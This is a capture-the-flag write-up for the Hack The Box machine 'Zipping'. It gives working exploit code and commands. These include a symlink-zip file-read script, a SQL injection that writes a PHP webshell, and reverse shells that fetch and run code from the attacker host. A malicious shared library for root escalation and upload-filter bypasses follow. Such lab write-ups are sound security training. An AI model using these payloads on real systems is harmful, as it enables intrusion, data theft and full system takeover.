Zipping is a medium-difficulty Linux machine that features a variety of attack vectors. This machine starts off by identifying a file upload capability within the web application that is vulnerable to a zip-file symlink attack, leading to arbitrary file-reads on the target. Leveraging this attack we can identify key pieces of information about the underlying web application to exploit an SQL injection to write a PHP webshell to the filesystem and leverage an LFI vulnerability to load the webshell to gain code execution. Once initial access is gained a binary is available with sudo
privileges that requires basic reverse engineering to recover the binary password. Further analysis of the binary shows that it is vulnerable to a library injection, where we can create a malicious library to be loaded with the binary and gain root access when it is executed with sudo
privileges.
Recon
1
2
3
4
5
6
7
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ writehosts htb '10.129.70.107 zipping.htb'
+---------+--------+---------------+-------------+
| PROFILE | STATUS | IP | DOMAIN |
+---------+--------+---------------+-------------+
| htb | on | 10.129.70.107 | zipping.htb |
+---------+--------+---------------+-------------+
|
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
# Nmap 7.94 scan initiated Sat Sep 2 23:45:20 2023 as: nmap -sVC -T4 -Pn -vv -oA ./nmap/full_tcp_scan -p 22,80 zipping.htb
Nmap scan report for zipping.htb (10.129.66.245)
Host is up, received user-set (0.12s latency).
Scanned at 2023-09-02 23:45:20 CST for 13s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 9.0p1 Ubuntu 1ubuntu7.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 9d:6e:ec:02:2d:0f:6a:38:60:c6:aa:ac:1e:e0:c2:84 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP6mSkoF2+wARZhzEmi4RDFkpQx3gdzfggbgeI5qtcIseo7h1mcxH8UCPmw8Gx9+JsOjcNPBpHtp2deNZBzgKcA=
| 256 eb:95:11:c7:a6:fa:ad:74:ab:a2:c5:f6:a4:02:18:41 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOXXd7dM7wgVC+lrF0+ZIxKZlKdFhG2Caa9Uft/kLXDa
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.54 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.54 (Ubuntu)
|_http-title: Zipping | Watch store
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 2 23:45:33 2023 -- 1 IP address (1 host up) scanned in 12.67 seconds
|
80 - Website : Watch Store
Info
Directory
1
| feroxbuster -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://zipping.htb/ -o ferox_80.txt
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ cat ferox_80.txt|grep -v "/assets/"
MSG 0.000 feroxbuster::heuristics detected directory listing: http://zipping.htb/assets (Apache)
301 GET 9l 28w 309c http://zipping.htb/shop => http://zipping.htb/shop/
MSG 0.000 feroxbuster::heuristics detected directory listing: http://zipping.htb/shop/assets (Apache)
200 GET 317l 1354w 16738c http://zipping.htb/
301 GET 9l 28w 309c http://zipping.htb/shop => http://zipping.htb/shop/
301 GET 9l 28w 312c http://zipping.htb/uploads => http://zipping.htb/uploads/
MSG 0.000 feroxbuster::heuristics detected directory listing: http://zipping.htb/assets (Apache)
200 GET 317l 1354w 16738c http://zipping.htb/
301 GET 9l 28w 309c http://zipping.htb/shop => http://zipping.htb/shop/
301 GET 9l 28w 312c http://zipping.htb/uploads => http://zipping.htb/uploads/
200 GET 113l 380w 5322c http://zipping.htb/upload.php
200 GET 317l 1354w 16738c http://zipping.htb/
|
User Flag
Enumeration
Tried to fuzz LFI but not found
1
| ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u http://zipping.htb/shop/index.php?page=FUZZ -fs 2615
|
Tried to find hidden pages, but nothing interesting
1
| ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u http://zipping.htb/shop/index.php?page=FUZZ -fs 2615
|
Shell as rektsu
Zip file upload to arbitrary file read
Enumerate
Check the file metadata
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| ┌──(bravosec㉿fsociety)-[~/Downloads]
└─$ exiftool download.pdf
ExifTool Version Number : 12.65
File Name : download.pdf
Directory : .
File Size : 171 kB
File Modification Date/Time : 2023:09:03 00:43:49+08:00
File Access Date/Time : 2023:09:03 00:43:49+08:00
File Inode Change Date/Time : 2023:09:03 00:43:49+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 8
Producer : pdfTeX-1.40.21
Creator : TeX
Create Date : 2020:08:21 14:05:59Z
Modify Date : 2020:08:21 14:05:59Z
Trapped : False
PTEX Fullbanner : This is pdfTeX, Version 3.14159265-2.6-1.40.21 (TeX Live 2020/Debian) kpathsea version 6.3.2
|
Did not find any exploit for this version of pdfTeX
Responses during the attempt to upload webshells :
Symlinks in zip
Hacktricks - Zip/Tar File Automatically decompressed Upload
1
2
3
4
5
6
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ ln -s ../../../../../../etc/passwd test.pdf
┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ zip --symlinks test.zip test.pdf
adding: test.pdf (stored 0%)
|
1
2
3
4
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping/loot]
└─$ cat passwd|grep sh$
root:x:0:0:root:/root:/bin/bash
rektsu:x:1001:1001::/home/rektsu:/bin/bash
|
Python automation script
read_file.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
| """
Hackthebox - Zipping
Arbitary file read via uploading a zip file containing a symlink
"""
import sys, os
import requests
import re
import subprocess
import uuid
UPLOAD_URL = "http://zipping.htb/upload.php"
TEMP_DIR = "/tmp/zip_exp"
def run_cmd(command: str) -> tuple[str, str]:
"""Run subprocess command"""
process = subprocess.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
shell=True,
)
output, error = process.communicate()
return output.decode("utf-8"), error.decode("utf-8")
def create_zip(fp: str) -> str:
random_name = str(uuid.uuid4())
pdf_name = f"{random_name}.pdf"
zip_name = f"{random_name}.zip"
run_cmd(f"ln -s {fp} {pdf_name}")
run_cmd(f"zip --symlinks {zip_name} {pdf_name}")
return f"{TEMP_DIR}/{zip_name}"
def exp(target_fp: str) -> str:
zip_fp = create_zip(target_fp)
file_name = "resume.zip"
files = {
"zipFile": (
file_name,
open(zip_fp, "rb"),
"application/zip"
)
}
data = {"submit": ""}
with open(zip_fp, "rb") as f:
r = requests.post(UPLOAD_URL, files=files, data=data)
# print(r.text)
try:
download_path = re.findall(r'following path:</p><a href="(.*?)"', r.text)[0]
except IndexError:
print("[- ]Download Link not found")
sys.exit(1)
return f"http://zipping.htb/{download_path}"
def read_file(fp: str) -> str:
download_url = exp(fp)
# print(f"[+] URL : {download_url}")
r = requests.get(download_url)
if r.status_code != 200:
print(f"[-] Download returned code : {r.status_code}")
sys.exit(1)
return r.text
def main():
if not os.path.exists(TEMP_DIR):
os.mkdir(TEMP_DIR)
os.chdir(TEMP_DIR)
fp = sys.argv[1]
print(read_file(fp))
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: python3 read_file.py <file_path>")
sys.exit(1)
main()
|
Check some interesting places
1
2
3
4
5
6
7
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ python read_file.py /proc/self/cmdline
/usr/sbin/apache2-kstart
┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ python read_file.py /proc/self/environ
[-] Download returned code : 404
|
Analyze source code
upload.php
1
2
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ python read_file.py /proc/self/cwd/upload.php | tee ../loot/upload.php
|
I can’t control $zipFile
and $uploadPath
, so there’s no command injection
LFI in /shop/index.php
/proc/self/cwd/shop/index.php
1
2
3
4
5
6
7
8
9
10
| <?php
session_start();
// Include functions and connect to the database using PDO MySQL
include 'functions.php';
$pdo = pdo_connect_mysql();
// Page is set to home (home.php) by default, so when the visitor visits, that will be the page they see.
$page = isset($_GET['page']) && file_exists($_GET['page'] . '.php') ? $_GET['page'] : 'home';
// Include and show the requested page
include $page . '.php';
?>
|
It uses include
but forces to add the .php
extension, so common LFI to RCE methods like log poisoning and php filter chain to RCE won’t work
Mysql root credentials in /shop/functions.php
/proc/self/cwd/shop/functions.php
It’s connecting as root
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| <?php
function pdo_connect_mysql() {
// Update the details below with your MySQL details
$DATABASE_HOST = 'localhost';
$DATABASE_USER = 'root';
$DATABASE_PASS = 'MySQL_P@ssw0rd!';
$DATABASE_NAME = 'zipping';
try {
return new PDO('mysql:host=' . $DATABASE_HOST . ';dbname=' . $DATABASE_NAME . ';charset=utf8', $DATABASE_USER, $DATABASE_PASS);
} catch (PDOException $exception) {
// If there is an error with the connection, stop the script and display the error.
exit('Failed to connect to database!');
}
}
// Template header, feel free to customize this
...
?>
|
Check password reuse, failed
1
2
3
4
5
6
7
8
9
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ cssh root@zipping.htb 'MySQL_P@ssw0rd!'
Warning: Permanently added 'zipping.htb' (ED25519) to the list of known hosts.
Permission denied, please try again.
┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ cssh rektsu@zipping.htb 'MySQL_P@ssw0rd!'
Warning: Permanently added 'zipping.htb' (ED25519) to the list of known hosts.
Permission denied, please try again.
|
Dump php files under /shop/
Find php files from /shop/index.php?page=
endpoint
1
| ffuf -c -u 'http://zipping.htb/shop/index.php?page=FUZZ' -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -fs 2615 -o ffuf_page.json
|
1
2
3
4
5
6
7
8
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ cat ffuf_page.json|jq '.results[].input.FUZZ' -r | tee shop_php.todump
index
cart
product
products
functions
placeorder
|
Dump php files
1
2
3
4
5
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ mkdir -p dump/80/shop
┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ for f in $(cat shop_php.todump); do FN="$f.php"; python exploit/read_file.py "/proc/self/cwd/shop/${FN}" | tee dump/80/shop/$FN; done
|
SQLI in /shop/cart.php
/proc/self/cwd/shop/cart.php
The SQLI vulnerability was obviously described in the comments : Construct the SQL statement with a vulnerable parameter
, Execute the SQL statement without any sanitization or parameter binding
And this is the only php file that didn’t use prepare()
My guess is that the creator utilized Github Copilot to generate codes with comments (It is very convenience)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
| <?php
// If the user clicked the add to cart button on the product page we can check for the form data
if (isset($_POST['product_id'], $_POST['quantity'])) {
// Set the post variables so we easily identify them, also make sure they are integer
$product_id = $_POST['product_id'];
$quantity = $_POST['quantity'];
// Filtering user input for letters or special characters
if(preg_match("/^.*[A-Za-z!#$%^&*()\-_=+{}\[\]\\|;:'\",.<>\/?]|[^0-9]$/", $product_id, $match) || preg_match("/^.*[A-Za-z!#$%^&*()\-_=+{}[\]\\|;:'\",.<>\/?]/i", $quantity, $match)) {
echo '';
} else {
// Construct the SQL statement with a vulnerable parameter
$sql = "SELECT * FROM products WHERE id = '" . $_POST['product_id'] . "'";
// Execute the SQL statement without any sanitization or parameter binding
$product = $pdo->query($sql)->fetch(PDO::FETCH_ASSOC);
// Check if the product exists (array is not empty)
if ($product && $quantity > 0) {
// Product exists in database, now we can create/update the session variable for the cart
if (isset($_SESSION['cart']) && is_array($_SESSION['cart'])) {
if (array_key_exists($product_id, $_SESSION['cart'])) {
// Product exists in cart so just update the quanity
$_SESSION['cart'][$product_id] += $quantity;
} else {
// Product is not in cart so add it
$_SESSION['cart'][$product_id] = $quantity;
}
} else {
// There are no products in cart, this will add the first product to cart
$_SESSION['cart'] = array($product_id => $quantity);
}
}
// Prevent form resubmission...
header('location: index.php?page=cart');
exit;
}
}
...
|
SQLI to RCE
Bypass preg_match()
1
| preg_match("/^.*[A-Za-z!#$%^&*()\-_=+{}\[\]\\|;:'\",.<>\/?]|[^0-9]$/"
|
Since the regex starts with ^.*
and doesn’t use /m
to match multi lines
Put a new line character : %0a
at the beginning to bypass the check
The regular expression checks if procuct_id
was ended with digits, so put 1
at the end of query
Write webshell
We have root
session for mysql, which can write files
1
2
3
4
5
| POST /shop/index.php?page=cart HTTP/1.1
Host: zipping.htb
'; select '<?php phpinfo();?>' INTO OUTFILE '/var/lib/mysql/x.php'; --1
|
1
| GET /shop/index.php?page=/var/lib/mysql/x HTTP/1.1
|
1
2
3
4
5
| POST /shop/index.php?page=cart HTTP/1.1
Host: zipping.htb
%0a'%3b%20select%20'%3c%3f%3d%60%24_GET%5b0%5d%60%3b'%20INTO%20OUTFILE%20'%2fvar%2flib%2fmysql%2fxx.php'%3b%20--1
|
Decoded payload :
1
| '; select '<?=`$_GET[0]`;' INTO OUTFILE '/var/lib/mysql/xx.php'; --1
|
Check command execution
1
| GET /shop/index.php?page=/var/lib/mysql/xx&0=id HTTP/1.1
|
Setup web server to host reverse shell
1
2
3
| mkdir -p www&&cd www
echo '/bin/bash -i >& /dev/tcp/10.10.16.16/1111 0>&1' > index.html
python -m http.server 80
|
Get reverse shell
1
2
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ http 'http://zipping.htb/shop/index.php?page=/var/lib/mysql/xx&0=curl 10.10.16.16|bash'
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ nc -lvnp 1111
listening on [any] 1111 ...
connect to [10.10.16.16] from (UNKNOWN) [10.129.50.229] 44990
bash: cannot set terminal process group (1124): Inappropriate ioctl for device
bash: no job control in this shell
rektsu@zipping:/var/www/html/shop$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<op$ python3 -c 'import pty; pty.spawn("/bin/bash")'
rektsu@zipping:/var/www/html/shop$ ^Z
zsh: suspended nc -lvnp 1111
┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ stty raw -echo;fg
[2] - continued nc -lvnp 1111
rektsu@zipping:/var/www/html/shop$ export TERM=xterm
rektsu@zipping:/var/www/html/shop$ id
id
uid=1001(rektsu) gid=1001(rektsu) groups=1001(rektsu)
rektsu@zipping:/var/www/html/shop$ cat ~/user.txt
cat ~/user.txt
365f8c94776915650de70c8312c875f3
|
Root Flag
From rektsu to root
Run linpeas in background
1
2
3
4
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping]
└─$ rlwrap nc -lvnp 1111
listening on [any] 1111 ...
curl 10.10.16.16/linpeas.sh|bash
|
1
2
| rektsu@zipping:/var/www/html/shop$ curl 10.10.16.16|bash&
[9] 2122
|
SUDO - so injection
Find hijackable shared object
1
2
3
4
5
6
7
| rektsu@zipping:/var/www/html/shop$ sudo -l
Matching Defaults entries for rektsu on zipping:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User rektsu may run the following commands on zipping:
(ALL) NOPASSWD: /usr/bin/stock
|
1
2
| rektsu@zipping:/var/www/html/shop$ file /usr/bin/stock
/usr/bin/stock: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=aa34d8030176fe286f8011c9d4470714d188ab42, for GNU/Linux 3.2.0, not stripped
|
1
2
3
| rektsu@zipping:/var/www/html/shop$ sudo /usr/bin/stock
Enter the password: *
Invalid password, please try again.
|
Get password
1
| rektsu@zipping:/var/www/html/shop$ strings /usr/bin/stock
|
Played around a bit in the application, didn’t find any abuseable functions
1
2
3
4
5
6
7
8
9
10
| rektsu@zipping:/var/www/html/shop$ sudo /usr/bin/stock
Enter the password: St0ckM4nager
================== Menu ==================
1) See the stock
2) Edit the stock
3) Exit the program
Select an option:
|
Check availability of ltrace
or strace
1
2
3
4
5
| rektsu@zipping:/var/www/html/shop$ ltrace
bash: ltrace: command not found
rektsu@zipping:/var/www/html/shop$ strace
strace: must have PROG [ARGS] or -p PID
Try 'strace -h' for more information.
|
Check SO injection with filters
Refer - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#suid-binary-.so-injection
Enter the password after it pause, since grep have suppressed the prompt message
1
2
3
4
5
6
| rektsu@zipping:/home/rektsu$ strace /usr/bin/stock 2>&1 | grep -i -E "open|access|no such file"
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
St0ckM4nager
openat(AT_FDCWD, "/home/rektsu/.config/libcounter.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
|
It is calling /home/rektsu/.config/libcounter.so
, which have the result No such file or directory
Hijack
1
| rektsu@zipping:/home/rektsu$ nano /home/rektsu/.config/libcounter.c
|
/home/rektsu/.config/libcounter.c
1
2
3
4
5
6
7
8
9
10
|
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject(){
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
|
1
2
3
4
5
6
7
| rektsu@zipping:/home/rektsu$ gcc -shared -o /home/rektsu/.config/libcounter.so -fPIC /home/rektsu/.config/libcounter.c
rektsu@zipping:/home/rektsu$ sudo /usr/bin/stock
Enter the password: St0ckM4nager
root@zipping:/home/rektsu# id
uid=0(root) gid=0(root) groups=0(root)
root@zipping:/home/rektsu# cat /root/root.txt
5b163c05e131ae7b5f8ea84405029ea5
|
Additional
Unintended way to rektsu
Bypass extension check in zip file with null bytes
7z
will ignore null bytes but php checkers will not, so rev.php .pdf
will pass the check
It will be extracted to /tmp/uploads/<md5sum>/rev.php
and being moved to /var/www/html/uploads/
rev.php0.pdf
1
| <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.14/1111 0>&1'");?>
|
1
2
3
| ┌──(bravosec㉿fsociety)-[~/Downloads]
└─$ zip final.zip rev.php0.pdf
adding: rev.php0.pdf (deflated 11%)
|
Use imHex to edit the zip file (Or edit in burpsuite repeater from hex view)
Replace 0
string to null bytes (00
in hex) in the rev.php0.pdf
at bottom
Upload it then get a shell
1
2
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ curl 'http://zipping.htb/shop/index.php?page=../../../../../../tmp/uploads/8c143ce49eb8765ab338ff87970a0c9e/rev'
|
1
2
3
4
5
6
7
8
9
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ nc -lvnp 1111
listening on [any] 1111 ...
connect to [10.10.14.14] from (UNKNOWN) [10.129.61.217] 50346
bash: cannot set terminal process group (1095): Inappropriate ioctl for device
bash: no job control in this shell
rektsu@zipping:/var/www/html/shop$ id
id
uid=1001(rektsu) gid=1001(rektsu) groups=1001(rektsu)
|
phar wrapper to RCE
- Write a php webshell
- Zip the web shell and save as
.pdf
- Use LFI with
phar://
wrapper to include the webshell inside the uploaded PDF file
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ cp /usr/share/webshells/php/php-reverse-shell.php rev.php
┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ sed -i -e 's/127.0.0.1/10.10.14.35/' -e 's/1234/1111/' rev.php
┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ zip ok.pdf rev.php
adding: rev.php (deflated 18%)
┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ zip ok.zip ok.pdf
updating: ok.pdf (deflated 37%)
|
1
2
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ curl 'http://zipping.htb/shop/index.php?page=phar:///var/www/html/uploads/430fe450eeb494ff835e4a8bf979361f/ok.pdf/rev'
|
1
2
3
4
5
6
7
8
9
10
11
| ┌──(bravosec㉿fsociety)-[~/htb/Zipping/exploit]
└─$ nc -lvnp 1111
listening on [any] 1111 ...
connect to [10.10.14.35] from (UNKNOWN) [10.129.61.217] 48818
Linux zipping 5.19.0-46-generic #47-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 16 13:30:11 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
19:01:47 up 1:29, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(rektsu) gid=1001(rektsu) groups=1001(rektsu)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(rektsu) gid=1001(rektsu) groups=1001(rektsu)
|